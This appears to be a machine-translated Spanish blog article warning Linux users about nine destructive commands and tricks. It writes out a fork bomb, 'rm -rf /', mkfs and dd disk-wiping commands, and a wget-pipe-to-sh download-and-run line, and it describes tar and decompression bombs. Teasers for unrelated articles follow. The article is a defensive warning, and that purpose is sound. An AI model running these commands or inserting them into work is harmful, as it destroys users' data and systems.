es.hideout-lastation.com
Paraíso Para Los Diseñadores Y Desarrolladores


9 Comandos y códigos de Linux para tener cuidado con

Los comandos de shell / terminal de Linux son muy potentes y un simple comando podría llevar a que se elimine una carpeta, archivos o carpeta raíz, etc.

En algunos casos, Linux ni siquiera le pedirá confirmación, sino que ejecutará el comando de inmediato, lo que le hará perder información y datos valiosos almacenados en estos archivos y carpetas.

Es común que las personas publiquen contenido en la web recomendando nuevos usuarios de Linux para ejecutar estos comandos . Esto puede parecer una broma para alguien que ha publicado el contenido, pero no es risa para la persona del otro lado.

Hemos reunido algunos comandos de Linux que son bastante dañinos para su sistema y que lo ayudarán a evitarlos. Tenga en cuenta que, de hecho, son peligrosos e incluso pueden modificarse de diversas maneras para producir nuevos comandos que infligen más daño.

Una cosa importante a tener en cuenta es que algunos de estos comandos solo son peligrosos si están prefijados con sudo en Ubuntu . Mientras que en otras distribuciones de Linux, la mayoría de estos comandos dados serán peligrosos de ejecutar como raíz.

Eche un vistazo a los 9 comandos y códigos que debe evitar ejecutar.

1. Comando Linux Fork Fork

:(){ :|: & };: también conocido como Fork Bomb es un ataque de denegación de servicio contra un sistema Linux. :(){ :|: & };: es una función bash. Una vez ejecutado, se repite varias veces hasta que el sistema se congela .

Solo puede deshacerse de él reiniciando su sistema. Así que tenga cuidado al ejecutar este comando en su shell de Linux.

2. carpeta mv / dev / null Command

mv folder/dev/null es otro comando arriesgado. Dev/null o null device es un archivo de dispositivo que descarta todos los datos escritos pero informa que la operación de escritura se ejecuta con éxito . También se lo conoce como bit bucked o black hole .

3. comando rm -rf

rm -rf comando rm -rf es una forma rápida de eliminar una carpeta y su contenido en el sistema operativo Linux. Si no sabe cómo usarlo correctamente, puede volverse muy peligroso para el sistema. Las combinaciones y opciones más comunes utilizadas con el comando rm-rf se enumeran a continuación:

  • rm comando rm se usa para eliminar los archivos en el sistema Linux.
  • rm -f comando rm -f elimina los archivos de solo lectura en la carpeta sin preguntar.
  • rm -r comando elimina el contenido de una carpeta recursivamente.
  • rm -d comando rm -d se usa para eliminar un directorio vacío pero rechazará eliminar el directorio si no está vacío.
  • rm -rf/ command se usa para eliminación forzada (lo elimina incluso si está protegido contra escritura) de todo el contenido en el directorio raíz y las subcarpetas.
  • rm -rf* comando rm -rf* se usa para borrar forzosamente todo el contenido del directorio actual (el directorio en el que está trabajando actualmente) y las subcarpetas.
  • rm -rf. comando se utiliza para la eliminación forzada de todo el contenido en la carpeta actual y las subcarpetas. El rm -r.[^.]* También se puede usar.
  • rm -i comando rm -i se usa para eliminar archivos y carpetas, pero aparecerá un mensaje antes de eliminarlo.

4. comando de mkfs

mkfs puede ser un comando peligroso para su sistema basado en Linux si no conoce su propósito. Cualquier cosa escrita después de los mkfs será formateada y reemplazada por un sistema de archivos Linux vacío .

Todos los comandos mencionados a continuación formatearán el disco duro y requieren derechos de administrador:

  • mkfs
  • mkfs.ext3
  • mkfs.bfs
  • mkfs.ext2
  • mkfs.minix
  • mkfs.msdos
  • mkfs.reiserfs
  • mkfs.vfat

El comando mkfs.cramfs hará lo mismo que el anterior pero no requiere derechos de administrador para ejecutarse.

5. Bomba Tar

El comando tar se usa para combinar múltiples archivos en un solo archivo (archivo archivado) en formato .tar . Se puede crear una bomba Tape Archive (Tar) con este comando.

Es un archivo de almacenamiento que explota en miles o millones de archivos con nombres similares a los archivos existentes en el directorio actual en lugar de hacerlo en un nuevo directorio cuando se desmarca.

Puede evitar convertirse en víctima de una bomba de alquitrán creando regularmente un nuevo directorio de protección cada vez que reciba un archivo tar y luego mueva el archivo tar recibido a este directorio antes de anular la marcación.

Si el archivo tar es de hecho una bomba alquitranada, simplemente puedes eliminar el directorio recién creado para deshacerte de él. Otra forma de evitar la explosión de una bomba de alquitrán es a través de la opción -t para listar todo el contenido de un archivo tar para darle una idea del tipo de contenido contenido en el archivo tar.

6. dd comando

El comando dd se usa para copiar y convertir particiones de disco duro . Sin embargo, puede resultar perjudicial si especifica un destino incorrecto.

El comando puede ser cualquiera de estos:

  • dd if=/dev/hda of=/dev/hdb
  • dd if=/dev/hda of=/dev/sdb
  • dd if=something of=/dev/hda
  • dd if=something of=/dev/sda

El siguiente comando pondrá a cero todo el disco duro primario: dd if=/dev/zero of=/dev/had

7. Código de script de shell

Alguien puede victimizarlo dándole el enlace a un guión de shell y endosando que lo descargue y lo ejecute . La secuencia de comandos puede contener algún código malicioso o peligroso dentro. El formato del comando puede verse así: wget http://some_malicious_source -O- | sh wget http://some_malicious_source -O- | sh . El wget descargará el script mientras sh descarga la ejecución del script.

8. Código fuente malicioso

Alguien te da el código fuente y te pide que compiles. El código puede parecer un código normal, pero de hecho, algunos códigos maliciosos se ocultan en el código fuente grande y pueden dañar el sistema. Para evitar ser víctima de este tipo de ataque, solo acepte y compile su código fuente de fuentes confiables .

9. Bomba de descompresión

Ha recibido un archivo comprimido y se le pide que extraiga este archivo, que parece ser de un tamaño muy pequeño, pero puede tener algunos KB. De hecho, este archivo comprimido de pequeño tamaño contiene datos muy comprimidos .

Una vez que el archivo se descomprime, se extraen cientos de GB de datos que pueden llenar su disco duro para reducir el rendimiento de su sistema. Para evitar esta situación, recuerde siempre aceptar datos de fuentes confiables.

Mejores casos de iPhone 8 y 8 Plus hasta el momento

Mejores casos de iPhone 8 y 8 Plus hasta el momento

No importa cuánto se jacte Apple por la durabilidad del cristal del iPhone 8, sigue siendo propenso a la rotura. La pantalla de su teléfono móvil se puede mantener segura mediante la aplicación de protectores de pantalla, sin embargo, para la parte posterior de vidrio necesita una carcasa resistente (especialmente cuando su vidrio posterior es más costoso de reparar que la pantalla).Ya s

(Consejos de tecnología y diseño)

Encontrar y reemplazar bases de datos de WordPress en masa - The Easy Way

Encontrar y reemplazar bases de datos de WordPress en masa - The Easy Way

Hay varias ocasiones en las que tenemos que cambiar las URL en nuestra base de datos del sitio web de WordPress . Por ejemplo, tenemos que hacer esto después de migrar una base de datos de WordPress desde un sitio, por ejemplo desde el sitio de producción remota http://acme.com, al sitio web de desarrollo local http://acme.d

(Consejos de tecnología y diseño)